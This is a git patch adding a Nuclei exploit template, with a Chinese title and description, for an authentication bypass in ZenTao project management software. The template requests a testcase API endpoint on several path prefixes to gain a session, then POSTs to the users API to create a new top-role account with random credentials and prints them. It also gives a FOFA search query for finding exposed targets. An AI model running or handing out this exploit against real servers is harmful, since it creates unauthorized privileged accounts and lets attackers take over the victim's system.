From 8d6b7f385e3c7bb61f5eee40b8b24cf190773929 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Mon, 29 Apr 2024 18:27:42 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E7=A6=85=E9=81=93=E9=A1=B9=E7=9B=AE?=
 =?UTF-8?q?=E7=AE=A1=E7=90=86=E7=B3=BB=E7=BB=9F=E8=BA=AB=E4=BB=BD=E8=AE=A4?=
 =?UTF-8?q?=E8=AF=81=E7=BB=95=E8=BF=87=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 禅道项目管理系统身份认证绕过漏洞.md | 79 +++++++++++++++++++++++++++++
 1 file changed, 79 insertions(+)

diff --git a/禅道项目管理系统身份认证绕过漏洞.md b/禅道项目管理系统身份认证绕过漏洞.md
index d63c95d..dcc600a 100644
--- a/禅道项目管理系统身份认证绕过漏洞.md
+++ b/禅道项目管理系统身份认证绕过漏洞.md
@@ -43,3 +43,82 @@ http:
           - 200
 # digest: 4a0a0047304502200b7a7cb58af457a9e566160cfdc539a99325db1513d5e4172a9a0a66f2f44e63022100fe0cc4ffd848c733eba3240bf102695253caa1420845a2b8aec5ca731e394759:58d4ffcb61df0489d6ab2fd018c17de6
 ```
+
+## 添加用户poc
+```
+id: easycorp-zentao-pms-idor-exp
+
+info:
+  name: 禅道项目管理系统身份认证绕过漏洞
+  author: GuoRong_X
+  severity: critical
+  description: |
+    - 禅道系统某些API设计为通过特定的鉴权函数进行验证，但在实际实现中，这个鉴权函数在鉴权失败后并不中断请求，而是仅返回一个错误标志，这个返回值在后续没有被适当处理。此外，该系统在处理某些API时未能有效检查用户身份，允许未认证的用户执行某些操作，从而绕过鉴权机制。
+  reference:
+    - https://mp.weixin.qq.com/s/hiGI_fQmXOHdkPqn6x00Jw
+  metadata:
+    verified: true
+    fofa-query: title="用户登录- 禅道"
+  tags: zentao
+variables:
+  username: '{{rand_base(6)}}'
+  password: '{{rand_base(12)}}'
+
+http:
+  - raw:
+      - |
+        GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /biz/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /max/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /api.php/v1/users HTTP/1.1
+        Host: {{Hostname}}
+
+        {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
+
+      - |
+        POST /zentao/api.php/v1/users HTTP/1.1
+        Host: {{Hostname}}
+
+        {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
+
+      - |
+        POST /biz/api.php/v1/users HTTP/1.1
+        Host: {{Hostname}}
+
+        {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
+
+      - |
+        POST /max/api.php/v1/users HTTP/1.1
+        Host: {{Hostname}}
+
+        {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
+    cookie-reuse: true
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_5, "{{username}}") || contains(body_6, "{{username}}") || contains(body_7, "{{username}}") || contains(body_8, "{{username}}")'
+        condition: and
+
+    extractors:
+      - type: dsl
+        dsl:
+          - '"USER: "+ username'
+          - '"PASS: "+ password'
+# digest: 4a0a00473045022100f877e8e0df5985e15645227a3f12f66e08fe50250102f4df141f234afcc0e2e90220485c468e8de448c3e9c92875d8a1bd6d8fafffa0f294fffd4a4443e221e6de6b:58d4ffcb61df0489d6ab2fd018c17de6
+
+```